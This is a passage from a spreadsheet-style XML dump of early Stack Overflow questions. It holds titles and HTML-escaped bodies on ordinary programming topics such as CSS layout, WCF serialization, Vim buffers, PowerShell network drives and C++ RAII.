    &amp;lt;a href="http://go.microsoft.com/fwlink/?LinkID=115261" style="text-decoration: none;"&amp;gt;
        &amp;lt;img src="http://go.microsoft.com/fwlink/?LinkId=108181" alt="Get Microsoft Silverlight"
    	style="border-style: none" /&amp;gt;
    &amp;lt;/a&amp;gt;
    &amp;lt;/object&amp;gt;
    &amp;lt;iframe style='visibility: hidden; height: 0; width: 0; border: 0px'&amp;gt;&amp;lt;/iframe&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This DIV is contained in a cell in a table, which again is part of a larger design. There's a lot of CSS as mentioned. Don't know if this helps...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Download files to local drive when sshed</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to download files to local hard drive when logged in to another computer using ssh in bash. I'm aware of sftp, but it is not convienent, e.g. it lacks tab completion of directory names. I'm using Ubuntu 8.04.1 . I don't have a public IP and would not like to setup dynamic Dynamic DNS solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>database synchronization - SFTP / RMAN / By codes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which method you all will recommend and why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to communicate between CE 6.0 device (as server) and PC (as client)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're in the process of developing a measurement device that will be running 
CE 6.0 with CF 3.5 on x86 embedded hardware, a PC is used to control the 
device and is connected with it using ethernet.&lt;/p&gt;
&lt;p&gt;We would like to communicate using interfaces (using DCOM (we know it is not 
supported by default on CE6), .NET Remoting or Web services) instead of 
using some sort of (custom) protocol. Calling methods defined in an 
interface is so much easier and elegant then parsing raw data.&lt;/p&gt;
&lt;p&gt;What would be the best solution in this case?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Controlling the WCF XmlSerializer</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some REST web services implemented in WCF. I wish to make these services return "Bad Request" when the xml contains invalid elements.&lt;/p&gt;
&lt;p&gt;The xml serialization is being handled by XmlSerializer. By default XmlSerializer ignores unknown elements. I know it is possible to hook XmlSerializer.UnknownElement and throw an exception from this handler, but because this is in WCF I have no control over serialization. Any ideas how I might implement this behavior.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Classic ASP Intranet and New ASP.NET Applications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have an existing classic ASP intranet consisting of hundreds of pages. Its directory structure looks like this...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/root
    app_1
    app_2
    ...
    img
    js
    style
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously app_1 and so on have better names in the actual directory structure.&lt;/p&gt;
&lt;p&gt;Even though the many applications have different behaviour, they are all part of the same intranet and therefore share a common look and feel by including stylesheets via /style, images via /img and client script via /js.&lt;/p&gt;
&lt;p&gt;The trouble (for me at least) comes when I want to add an intranet application in ASP.NET.&lt;/p&gt;
&lt;p&gt;Ultimately, I'd like this structure:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/root
    app_1
    app_2
    dotnetapp_1
    dotnetapp_2
    ...
    img
    js
    style
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It seems to me that ASP.NET "applications" like to think of themselves as separate from everything around them (this may just be my comprehension of how they are). You create a new "project" in Visual Studio and it's like you have a new "root" a level below the actual root I want to use. It's like this new application is a thing, standing alone, with its own images and style and whatnot. However, I want it to be a sub-part of the existing intranet.&lt;/p&gt;
&lt;p&gt;Ultimately I want to be able to make my whole classic ASP intranet the "root" and have ASP.NET "sub-applications" that can still access /style and /img and, I guess for ASP.NET I'll have /masterpages.&lt;/p&gt;
&lt;p&gt;I've tried this before, but I think VS choked on the couple of hundred classic ASP pages that it added to the "project" when I made my existing intranet root directory the ASP.NET project root (via File-&gt;Open-&gt;Web Site). I'd be nice to edit my existing classic ASP intranet using VS 2008 SP1 (I currently use the excellent &lt;a href="http://notepad-plus.sourceforge.net/uk/site.htm" rel="nofollow"&gt;Notepad++&lt;/a&gt;) because I'd like to get more hands on with VS but I guess this isn't absolutely necessary.&lt;/p&gt;
&lt;p&gt;I also tried treating each new ASP.NET application as an application in its own right, effectively making the /dotnetapp_1 directory the "root" of the application (again, via File-&gt;Open-&gt;Web Site in VS2008). However, VS then complained when I tried to reference /masterpages because it "belonged to another application." I think I kludged it by adding a virtual directory inside each ASP.NET directory that "pointed" to the root /masterpages but I'm not sure VS was able to happily provide WYSIWYG editing when I did this, as opposed to making a copy of the masterpage in every ASP.NET application I add to the intranet.&lt;/p&gt;
&lt;p&gt;I'm also quite likely to visit the .NET MVC framework so please offer any answers with that framework in mind. I'm hoping "projects" aren't quite to important with MVC and that rather it's just a bunch of files that creates an application that contributes to the whole (that being the intranet).&lt;/p&gt;
&lt;p&gt;So, the question is: &lt;strong&gt;How I can best add-on ASP.NET applications to an existing classic ASP intranet (I'm not concerned about the technicalities of session sharing between classic ASP and ASP.NET, only the structural layout of directories and projects) and be able to edit these separate applications in Visual Studio 2008 SP1 and yet have these application "related" to each other by a common, intranet look and feel*?&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Please don't just post the answer "use MasterPages." I appreciate MasterPages are .NET's method of sharing styles (and more probably) between related pages in the &lt;em&gt;same&lt;/em&gt; application. I get that. What I'm looking for is the best method of adding ASP.NET applications into the existing intranet as smoothly as I can that makes editing each application simple and where each application can share (if possible) an intranet-common style.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Is the web hosting location important these days?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was recently looking at some web hosting solutions and some of the providers offered various hosting locations e.g. US or UK based servers.&lt;/p&gt;
&lt;p&gt;My question is: does it really make a difference from the performance point of view? 
Lets say that I am expecting most of the traffic coming from continental Europe? &lt;/p&gt;
&lt;p&gt;Would the fact that the servers are based in UK make bigger difference if the traffic was coming from the UK.&lt;/p&gt;
&lt;p&gt;Any pros and cons of having a website hosted in the same county as the most of the expected traffic?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>iSeries SQL Procedure - Check if already exists</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an script that falls over if any of the procedures it is trying to create already exists. How can I check/drop if this procedure is already created?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In javaDoc, what's the best way of representing attributes in XML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you're adding javaDoc comments to your code and you're outlining the structure of an XML document that you're passing back, what's the best way to represent attributes? Is there a best practice for this?&lt;/p&gt;
&lt;p&gt;My general structure for my javaDoc comments is like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/**
 * ...
 * 
 * @return XML document in the form:
 * 
 * &amp;lt;pre&amp;gt;
 * &amp;amp;lt;ROOT_ELEMENT&amp;amp;gt;
 *    &amp;amp;lt;AN_ELEMENT&amp;amp;gt;
 *    &amp;amp;lt;MULTIPLE_ELEMENTS&amp;amp;gt;*
 * &amp;amp;lt;/ROOT_ELEMENT&amp;amp;gt;
 * &amp;lt;/pre&amp;gt;
 */
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What's the best way to loop through a set of elements in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In the past and with most my current projects I tend to use a for loop like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var elements = document.getElementsByTagName('div');
for (var i=0; i&amp;lt;elements.length; i++) {
    doSomething(elements[i]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've heard that using a "reverse while" loop is quicker but I have no real way to confirm this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var elements = document.getElementsByTagName('div'), 
    length = elements.length;
while(length--) {
    doSomething(elements[length]);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is considered as best practice when it comes to looping though elements in JavaScript, or any array for that matter?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamically instantiate a Ruby class similar to Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can this line in Java be translated to Ruby:&lt;br /&gt;
    String className = "java.util.Vector";&lt;br /&gt;
    ...&lt;br /&gt;
    Object o = Class.forName(className).newInstance();  &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Singular/plural searches and stemming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm discovering a simple solution for singular-plural keywords searches. I heard about stemming but I don't want to use all its features, only plural/singular transformation. The language is Dutch. Have looked at &lt;a href="http://www.snowball.tartarus.org" rel="nofollow"&gt;http://www.snowball.tartarus.org&lt;/a&gt; before. Does anyone know the simple solution for singular|plural relevant searches?
Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data generators for SQL server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to receive suggestions on the data generators that are available, for SQL server. If posting a response, please provide any features that you think are important. &lt;/p&gt;
&lt;p&gt;I have never used a application like this, so I am looking to be educated on the topic. Thank you.&lt;/p&gt;
&lt;p&gt;(My goal is to fill a database with 10,000+ records in each table, to test an application.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Table Column Formatting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to format a column in a &lt;code&gt;&amp;lt;table/&amp;gt;&lt;/code&gt; using a &lt;code&gt;&amp;lt;col/&amp;gt;&lt;/code&gt; element. I can set &lt;code&gt;background-color&lt;/code&gt;, &lt;code&gt;width&lt;/code&gt;, etc., but can't set the &lt;code&gt;font-weight&lt;/code&gt;. Why doesn't it work?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;table&amp;gt;
    &amp;lt;col style="font-weight:bold; background-color:#CCC;"&amp;gt;
    &amp;lt;col&amp;gt;
    &amp;lt;tr&amp;gt;
        &amp;lt;td&amp;gt;1&amp;lt;/td&amp;gt;
        &amp;lt;td&amp;gt;2&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
    &amp;lt;tr&amp;gt;
        &amp;lt;td&amp;gt;3&amp;lt;/td&amp;gt;
        &amp;lt;td&amp;gt;4&amp;lt;/td&amp;gt;
    &amp;lt;/tr&amp;gt;
&amp;lt;/table&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>CSS Layout, Vis Studio 2005, and AJAX Tab Container</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a C# Web app, VS 2005 (I am avoiding 2008 because I find the IDE to be hard to deal with), I am getting into a layout stew.&lt;/p&gt;
&lt;p&gt;I am moving from absolute positioning toward CSS relative positioning.&lt;/p&gt;
&lt;p&gt;I'd like to divide the screen into four blocks: top (header band), middle left (a stacked menu), middle right (content - here the AJAX tab container), and bottom (footer band), with all 4 blocks positioned relatively, but the controls in the middle right (content) block positioned absolutely relative to the top left corner of the block. A nice side benefit would be to have the IDE design window show all controls as they actually would be displayed, but I doubt this is possible.  The IDE is positioning all controls inside the tab panels relative to the top left of the design window; quite a mess.&lt;/p&gt;
&lt;p&gt;Right now, my prejudice is that CSS is good for relatively positioning blocks, artwork, text etc, but not good for input forms where it is important to  line up lots of labels, text boxes, ddl's, check boxes, etc.&lt;/p&gt;
&lt;p&gt;At any rate, my CSS is not yet up to the task - does anyone know of a good article, book, blog, etc which discusses CSS as it is implemented in ASP.NET, and which might include an example with an AJAX tab control?  Any help would be appreciated. &lt;/p&gt;
&lt;p&gt;Many thanks&lt;/p&gt;
&lt;p&gt;Mike Thomas &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to position one element relative to another with jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a hidden DIV which contains a toolbar-like menu.&lt;/p&gt;
&lt;p&gt;I have a number of DIVs which are enabled to show the menu DIV when the mouse hovers over them.&lt;/p&gt;
&lt;p&gt;Is there a built-in function which will move the menu DIV to the top right of the active (mouse hover) DIV? I'm looking for something like &lt;code&gt;$(menu).position("topright", targetEl);&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Math.IEEERemainder returns negative results. Why?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The .net framework includes Math.IEEERemainder(x, y) in addition to the standard mod operator.  What is this function really doing?  I dont understand the negative numbers that this produces.&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Math.IEEERemainder(0, 2) = 0
Math.IEEERemainder(1, 2) = 1
Math.IEEERemainder(2, 2) = 0
Math.IEEERemainder(3, 2) = -1
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Upgrading SVN 1.4 to 1.5.3 and CC.Net from 1.3 to 1.4</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think this is a multi-part question, so bear with me.&lt;/p&gt;
&lt;p&gt;Currently all of our developers use the version of Tortise built for SVN 1.4 and our SVN server is running 1.4. Our build server is running CC.Net and is using SVN 1.4.&lt;/p&gt;
&lt;p&gt;We want to upgrade. &lt;/p&gt;
&lt;p&gt;I've established that upgrading our clients to 1.5, then our server to 1.5 will work for us. However, the question comes in with CC.Net. Can we just upgrade the install of SVN on our build server to SVN 1.5? Or do we have to upgrade the install of CC.Net too? We'd like to also take this time to upgrade CC.Net, however, we'd like to make sure the SVN upgrade is done first, then come back and do CC.Net.&lt;/p&gt;
&lt;p&gt;Also adding to this mix is that in some of our projects we maintain a 'tools' folder that may or may not contain the binaries for SVN due to the nAnt scripts we use in those projects. I assume that if we upgrade the CC.Net server install of SVN to 1.5, we'll also need to update all of those projects as the CI server uses the same working directory as the nAnt scripts that get executed.&lt;/p&gt;
&lt;p&gt;clear as mud?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set up a mock queue using mockrunner to test an xml filter?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using the mockrunner package from &lt;a href="http://mockrunner.sourceforge.net/" rel="nofollow"&gt;http://mockrunner.sourceforge.net/&lt;/a&gt; to set up a mock queue for JUnit testing an XML filter which operates like this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;sets recognized properties for an ftp server to put and get xml input and a jms queue server that keeps track of jobs. Remotely there waits a server that actually parses the xml once a queue message is received.&lt;/li&gt;
&lt;li&gt;creates a remote directory using ftp and starts a queue connection using mqconnectionfactory to the given address of the queue server.&lt;/li&gt;
&lt;li&gt;once the new queue entry is made in 2), the filter waits for a new queue message to appear signifying the job has been completed by the remote server. The filter then grabs the modified xml file from the ftp and passes it along to the next filter. &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The JUnit test I am working on simply needs to emulate this environment by starting a local ftp and mock queue server for the filter to connect to, then waiting for the filter to connect to the queue and put the new xml input file on a local directory via a local ftp server, wait for the queue message and then modify the xml input slightly, put the modified xml in a new directory and post another message to the queue signifying the job has completed. &lt;/p&gt;
&lt;p&gt;All of the tutorials I have found on the net have used EJB and JNDI to lookup the queue server once it has been made. If possible, I'd like to sidestep that route by just creating a mock queue on my local machine and connecting to it in the simplest manner possible, not using EJB and JNDI.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool for translation of Oracle PL/SQL into Postgresql PL/pgSQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a tool (preferably free) which will translate Oracle's PL/SQL stored procedure language into Postgresql's PL/pgSQL stored procedure language?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>http/AJAX (GWT) vs Eclipse gui for thin client deployment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am starting a project for which we will have a thin client, sending requests and getting responses from a server.&lt;/p&gt;
&lt;p&gt;We are still in the planning stages, so we have a choice to settle on either an Eclipse based GUI (Eclipse plugin) or using GWT as a fromtend for the application.&lt;/p&gt;
&lt;p&gt;I am not very familiar with Eclipse as a GUI (Nor with GWT) but do know 'normal' Java.&lt;/p&gt;
&lt;p&gt;What would be the main benefits and drawbacks of either approach?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Addressing the questions posed:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The project, if Eclipse based, would be using the core Eclipse gui (No coding tools, just bare bones) and the GUI would be packaged with it.&lt;/li&gt;
&lt;li&gt;I have been looking at GWT and so far seems the best choice, but still have some research to do.&lt;/li&gt;
&lt;li&gt;Communication method is a variant of CORBA (In house libraries)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Performance Testing MSMQ Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone done any sort of performance tests against MSMQ?&lt;/p&gt;
&lt;p&gt;We have a solution in prod environment where errors are added to a MSMQ for distribution to databases or event monitors.&lt;/p&gt;
&lt;p&gt;We need to test the capacity of this system but not sure how to start.&lt;/p&gt;
&lt;p&gt;Anyone know any tools or have any tips?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to separate UI (designer/editor) logic from the Package framework (like Visual Studio Package)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to separate concerns here. Create and embed all the UI logic for the Custom XML designer, object model, validations etc in to a separate assembly. Then the Package framework should only register the designer information and ask for a UI Service and everything works magically.&lt;/p&gt;
&lt;p&gt;This way I don't need to play with the Package framework (Visual Studio Package) assembly, when I need to modify the UI designer.&lt;/p&gt;
&lt;p&gt;This question also applies to anything where you have to separate the UI logic from the Skeleton framework that loads it up, like a plugin.&lt;/p&gt;
&lt;p&gt;I have several choices a ServiceProvider model, a plugin model or may be other.&lt;/p&gt;
&lt;p&gt;Any samples, suggestions for patterns, links are welcome.&lt;/p&gt;
&lt;p&gt;Update 1: What I am looking for is a thought such as - "Does Prism (Composite WPF) fit the bill? Has anyone worked on a project/application which does the separation of concerns just like I mentioned above? etc" 
(I am still looking out for answers)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Search file in directory using complex pattern</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for a C# library for getting files or directory from a directory using a complex pattern like the one used in Ant:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;dir1/dir2/**/SVN/*&lt;/code&gt; --&gt; Matches all files in SVN directories that are located anywhere in the directory tree under dir1/dir2&lt;/li&gt;
&lt;li&gt;&lt;code&gt;**/test/**&lt;/code&gt; --&gt; Matches all files that have a test  element in their path, including test as a filename.&lt;/li&gt;
&lt;li&gt;...&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Do I need to code it myself? extract what I want from NAnt? Or this library exists and my google skill sucks.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Directory.GetFiles(String path, String searchPattern)&lt;/code&gt; doesn't handle directory pattern and &lt;a href="http://www.codeplex.com/FileDirectoryPath" rel="nofollow"&gt;NDepend.Helpers.FileDirectoryPath&lt;/a&gt; neither (it's a great library for path manipulation by the way)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In PowerShell, how can I determine the root of a drive (supposing it's a networked drive)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In PowerShell, even if it's possible to know if a drive is a network drive: see &lt;a href="http://stackoverflow.com/questions/158359/in-powershell-how-can-i-determine-if-the-current-drive-is-a-networked-drive-or"&gt;http://stackoverflow.com/questions/158359/in-powershell-how-can-i-determine-if-the-current-drive-is-a-networked-drive-or&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;When I try to get the "root" of the drive, I get back the drive letter.&lt;/p&gt;
&lt;p&gt;The setup:
MS-Dos "net use" shows that H: is really a mapped network drive:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;New connections will be remembered.
Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           H:        \\spma1fp1\JARAVJ$        Microsoft Windows Network
The command completed successfully.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Get-PSDrive tells us that the Root is H:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS:24 H:\temp
&amp;gt;get-psdrive  h
Name       Provider      Root      CurrentLocation
----       --------      ----      ---------------
H          FileSystem    H:\          temp
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and using system.io.driveinfo does not give us a complete answer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PS:13 H:\
&amp;gt;$x = new-object system.io.driveinfo("h:\")
PS:14 H:\
&amp;gt;$x.DriveType
Network
PS:15 H:\
&amp;gt;$x.RootDirectory
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----        29/09/2008     16:45            h:\
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any idea of how to get that info?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you find the largest font size that won't break a given text?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use CSS (&lt;strong&gt;under &lt;code&gt;@media print&lt;/code&gt;&lt;/strong&gt;) and JavaScript to print a one-page document with a given piece of text made as large as possible while still fitting inside a given width.  The length of the text is not known beforehand, so simply using a fixed-width font is not an option.&lt;/p&gt;
&lt;p&gt;To put it another way, I'm looking for proper resizing, so that, for example, "IIIII" would come out in a much larger font size than "WWWWW" because "I" is much skinnier than "W" in a variable-width font.&lt;/p&gt;
&lt;p&gt;The closest I've been able to get with this is using JavaScript to try various font sizes until the &lt;code&gt;clientWidth&lt;/code&gt; is small enough.  &lt;strong&gt;This works well enough for screen media, but when you switch to print media&lt;/strong&gt;, is there any guarantee that the 90 DPI I appear to get on my system (i.e., I put the margins to 0.5in either side, and for a text resized so that it fits just within that, I get about 675 for &lt;code&gt;clientWidth&lt;/code&gt;) will be the same anywhere else?  How does a browser decide what DPI to use when converting from pixel measurements?  Is there any way I can access this information using JavaScript?&lt;/p&gt;
&lt;p&gt;I would love it if this were just a CSS3 feature (&lt;code&gt;font-size:max-for-width(7.5in)&lt;/code&gt;) but if it is, I haven't been able to find it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can you combine multiple images into a single one using JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am wondering if there is a way to combine multiple images into a single image using only JavaScript.  Is this something that Canvas will be able to do.  The effect can be done with positing, but can you combine them into a single image for download?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update Oct 1, 2008:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Thanks for the advice, I was helping someone work on a js/css only site, with jQuery and they were looking to have some MacOS dock-like image effects with multiple images that overlay each other.  The solution we came up with was just absolute positioning, and using the effect on a parent &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; relatively positioned. It would have been much easier to combine the images and create the effect on that single image.&lt;/p&gt;
&lt;p&gt;It then got me thinking about online image editors like &lt;a href="http://www.picnik.com/"&gt;Picnik&lt;/a&gt; and wondering if there could be a browser based image editor with photoshop capabilities written only in javascript.  I guess that is not a possibility, maybe in the future?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Linq with WCF</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for any examples or guides to using Linq over WCF (n-tier application). Please specify if you are showing something for Linq-to-SQL or Linq-to-entities. I would like to see usage examples for both. &lt;/p&gt;
&lt;p&gt;I am wondering how things like deffered execution works over WCF (if it works at all)? Cyclic references support and so on... &lt;/p&gt;
&lt;p&gt;Any information to make this a quick start guide to using Linq with WCF is helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Update fonts recursively on a Delphi form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to iterate all the controls on a form and enable ClearType font smoothing. Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;procedure TForm4.UpdateControls(AParent: TWinControl);
var
  I: Integer;
  ACtrl: TControl;
  tagLOGFONT: TLogFont;
begin
  for I := 0 to AParent.ControlCount-1 do
  begin
    ACtrl:= AParent.Controls[I];
    // if ParentFont=False, update the font here...
    if ACtrl is TWinControl then
      UpdateControls(Ctrl as TWinControl);
  end;
end;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, is there a easy way to check if &lt;code&gt;ACtrl&lt;/code&gt; have a &lt;code&gt;Font&lt;/code&gt; property so i can pass the &lt;code&gt;Font.Handle&lt;/code&gt; to somethink like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;GetObject(ACtrl.Font.Handle, SizeOf(TLogFont), @tagLOGFONT);
tagLOGFONT.lfQuality := 5;
ACtrl.Font.Handle := CreateFontIndirect(tagLOGFONT);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thank you in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Get the NTLM credentials from the Response on an APSX page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an ASPX page (On server A) which is invoked using NTLM credentials.  Part of that page's job is to call an HTML page (On server B) and proxy it back to the client.  (The firewall allows access to A, but not to B.  The user would normally be allowed access to both servers.).  Server B is also not open to anonymous access, so I need to supply credentials to it.&lt;/p&gt;
&lt;p&gt;If I hardcode some credentials (as per the attached code), it works, but ideally I would echo the credentials that were received by the .aspx page.  Is there some way to get those NetworkCredentials so I can pass them on?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void Page_Load(object sender, EventArgs e) { 
    Response.Clear(); 
    WebClient proxyFile = new WebClient(); 
    CredentialCache cc = new CredentialCache(); 
    cc.Add(new Uri("http://serverB/"), "NTLM", 
        new NetworkCredential("userName", "password", "domain")); 
    proxyFile.Credentials = cc; 
    Stream proxyStream = proxyFile.OpenRead("http://serverB/Content/webPage.html"); 
    int i; 
    do { 
        i = proxyStream.ReadByte(); 
        if (i != -1) { 
            Response.OutputStream.WriteByte((byte)i); 
        } 
    } while (i != -1); 
    Response.End(); 
} 
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Easiest way to migrate Word 2003 custom macro toolbars into Word 2007?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a series of macros and toolbars that I developed for Word 2003.  Now that my office is upgrading to Word 2007, I need to migrate them.  The macros themselves migrate with zero effort, but the toolbars are a different issue.  A random subset of the toolbars show up in the "Add-Ins" ribbon tab, but I haven't found a way to control which ones.  &lt;/p&gt;
&lt;p&gt;Something that may be a complication is that I deploy the macros by placing a template into a user's Word STARTUP folder (C:\Documents and Settings\username\Application Data\Microsoft\Word\STARTUP).  While I can add macros from normal.dot into the Quick Access Toolbar, I cannot add macros from this startup template.  I'd like a better, more structured layout anyway. &lt;/p&gt;
&lt;p&gt;So, what's the easiest way to replicate my custom macro toolbars in Word 2007?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Resetting Buffers in Vim</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to reset the alternate buffer in a vim session to what it was previously?&lt;/p&gt;
&lt;p&gt;By alternate buffer, I mean the one that is referred to by #, i.e. the one that is displayed when you enter cntl-^.&lt;/p&gt;
&lt;p&gt;Say I've got two files open main.c and other.c and :ls gives me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  1 %a   "main.c"              lines 27
  2 #    "other.c"             lines 56
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Say I open another file, e.g. refer.c, :ls will now give me:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  1 %a   "main.c"              lines 27
  2      "other.c"             lines 56
  3 #    "refer.c"             lines 125
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I delete the buffer containing refer.c, :ls now shows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  1 %a   "main.c"              lines 27
  2      "other.c"             lines 56
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But if I do a cntl-^, refer.c will be displayed again!&lt;/p&gt;
&lt;p&gt;Is there some way to get vim to reset the alternate buffer back to what it last was automatically? A "history" of alternate buffers?&lt;/p&gt;
&lt;p&gt;Or am I stuck with doing a :2 b to reload other.c into the alternate buffer?&lt;/p&gt;
&lt;p&gt;Or maybe there is a good reason for this behaviour?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Eclipse RCP Toolbar buttons with the Eclipse Look</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Eclipse, its easy to specify buttons for your toolbar using the ActionSets extension point.  However, when I need to specify some items programmatically, I can't get the same look.  I don't believe that the framework is using native buttons for these, but so far, I can't find the right recipe to match the Eclipse look.  I wanted to see if anyone has found the right snippet to duplicate this functionality in code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RAII vs. exceptions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The more we use RAII in C++, the more we find ourselves with destructors that do non-trivial deallocation. Now, deallocation (finalization, however you want to call it) can fail, in which case exceptions are really the only way to let anybody upstairs know of our deallocation problem. But then again, throwing-destructors are a bad idea because of the possibility of exceptions being thrown during stack unwinding. &lt;code&gt;std::uncaught_exception()&lt;/code&gt; lets you know when that happens, but not much more, so aside from letting you log a message before termination there's not much you can do, unless you're willing to leave your program in an undefined state, where some stuff is deallocated/finalized and some not.&lt;/p&gt;
&lt;p&gt;One approach is to have no-throw destructors. But in many cases that just hides a real error. Our destructor might, for example, be closing some RAII-managed DB connections as a result of some exception being thrown, and those DB connections might fail to close. This doesn't necessarily mean we're ok with the program terminating at this point. On the other hand, logging and tracing these errors isn't really a solution for every case; otherwise we would have had no need for exceptions to begin with. 
